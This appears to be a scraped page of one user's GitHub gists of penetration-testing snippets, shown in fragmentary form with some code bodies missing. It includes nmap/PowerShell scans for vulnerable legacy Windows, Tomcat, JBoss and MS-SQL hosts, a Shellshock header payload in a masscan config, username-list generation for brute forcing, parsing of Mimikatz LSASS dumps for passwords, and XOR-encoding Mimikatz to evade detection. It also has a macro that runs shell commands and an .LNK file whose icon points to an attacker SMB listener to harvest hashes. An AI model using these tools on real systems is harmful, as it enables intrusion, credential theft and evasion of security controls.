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#Uses carlos'
$hosts = Get-AuditDSComputerAccount -DomainController <IP> -Credential (Get-Credential)
$hosts | Where-Object {(($_.OperatingSystem -match "XP" -and $_.ServicePack -eq "Service Pack 1") -or ($_.OperatingSystem -match "XP" -and $_.ServicePack -eq "Service Pack 2") -or ($_.OperatingSystem -match "XP" -and $_.ServicePack -eq "")) -or ($_.OperatingSystem -match "2000") -or (($_.OperatingSystem -match "2003" -and $_.ServicePack -eq "") -or ($_.OperatingSystem -match "2003" -and $_.ServicePack -eq "Service Pack 1"))}
#Find tomcat/jboss,ms-sql - Uses carlos'
nmap -Pn -p 1433,80,8080,8008,8000,8443,443,8000-8010 -sV -Pn -T4 --min-hostgroup 256 --min-parallelism 32 --script=http-title,ms-sql-empty-password -iL <subnetst2scan> -oX easy-wins.xml
$nmaphosts = Import-NmapXML -NmapXML easy-wins.xml -InfoType Hosts
$nmaphosts | Where-Object {$_.Ports.Service.Product -match "tomcat"} | select-object Ipv4Address | Out-File Tomcat-Hosts.txt
$nmaphosts | Where-Object {$_.Ports.Service.Product -match "jboss"} | select-object Ipv4Address | Out-File Jboss-Hosts.txt
$nmaphosts | Where-Object {$_.Ports.Service.Product -match "Mbedthis"} | Select-Object IPv4Address | Out-File iDRAC-Hosts.txt
$nmaphosts | Where-Object {$_.Ports.Service.Product -match "ms-sql-server"} | select-object Ipv4Address | Out-File MS-SQL-Hosts.txt
breakersall / gist:71479c9b68be425b8198
Created July 28, 2014 18:31
Decode base 64 for unattend
$pass = "string"
PS> [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($pass))
breakersall / gist:9f5250f76295626d6e12
Last active August 29, 2015 14:06
ShellShock Anti-Shock - masscan
#InfoSec good dead fairy
#Original from shellshock-scan (
target =
port = 80
banners = true
http-user-agent = InfosecFairy
http-header = Cookie:() { :; }; apt-get update -y; apt-get upgrade -y; yum update bash -y
http-header = Host:() { :; }; apt-get update -y; apt-get upgrade -y; yum update bash -y
http-header = Referer:() { :; }; apt-get update -y; apt-get upgrade -y; yum update bash -y
breakersall / gist:f966fc4e25ba9b231c30
Last active August 29, 2015 14:06
Parse facebook namelist into usable lists for username bruteforcing
$Unamestream = new-object System.IO.StreamWriter("names.txt")
$FNames = Get-Content fname_10.txt
$LNames = Get-Content lname_10.txt
foreach ($FName in $FNames)
foreach ($LName in $LNames)
$Name = "$FName" + "." + "$LName"
breakersall / gist:191d4a031704387475da
Last active August 29, 2015 14:16
Dump new users passwords
#Number of minutes to go
[int]$MinutesToCheck = 10080
function Find-4648Logons
Retrieve the unique 4648 logon events. This will often find cases where a user is using remote desktop to connect to another computer. It will give the
the account that RDP was launched with and the account name of the account being used to connect to the remote computer. This is useful
for identifying normal authenticaiton patterns. Other actions that will trigger this include any runas action.
Function: Find-4648Logons
Function ParseMimiLsass
$UnameRegex = '^*[Username]{8}'
$DomainRegex = '^*[Domain]{6}'
$PassRegex = '^*[Password]{8}[ ][:]'
$Domains = select-string -Path $LootDirectory\Mimikatz-LSASS-OUT-64.txt -Pattern $DomainRegex | Select-Object Line
$Usernames = select-string -Path $LootDirectory\Mimikatz-LSASS-OUT-64.txt -Pattern $UnameRegex | Select-Object Line
$Passwords = select-string -Path $LootDirectory\Mimikatz-LSASS-OUT-64.txt -Pattern $PassRegex | Select-Object Line
$Domains32 = select-string -Path $LootDirectory\Mimikatz-LSASS-OUT-32.txt -Pattern $DomainRegex | Select-Object Line
$Usernames32 = select-string -Path $LootDirectory\Mimikatz-LSASS-OUT-32.txt -Pattern $UnameRegex | Select-Object Line
breakersall / gist:c32ff9b2b0fb9fc26c1a
Last active December 17, 2015 21:10
Example of xor'ing Mimikatz to avoid hash based detection
$inputMim = "C:\Tools\Mimikatz.txt"
$OutMimEnc = "C:\Tools\EncMimikatz.txt"
$bytes = [System.IO.File]::ReadAllBytes("$inputMim")
$key = 137
for($i=0; $i -lt $bytes.count ; $i++)
$bytes[$i] = $bytes[$i] -bxor $key
[System.IO.File]::WriteAllBytes("$OutMimEnc", $bytes)
breakersall / VBA-Python.txt
Created April 20, 2016 19:38
Example VBA calling and executing Python
Sub zxzcvzxcvzxvxzcv()
myAppleScript = "do shell script ""/usr/bin/python -c 'import webbrowser; webbrowser.open_new(\""\"")' """
MacScript (myAppleScript)
End Sub
breakersall / .LNK PowerShell Post Exploitation
Created September 29, 2016 23:22
Create .LNK UNC path via PS
$LinkedEXE = "$env:SystemRoot\System32\notepad.exe"
$LNKSaveFile = "pathtosavelnk"
$WScriptShell = New-Object -ComObject Wscript.Shell
$Shortcut = $WScriptShell.CreateShortcut($LNKSaveFile)
$Shortcut.TargetPath = $LinkedEXE
$Shortcut.IconLocation = "\\IPOFSMBLISTENER\images\images.ico"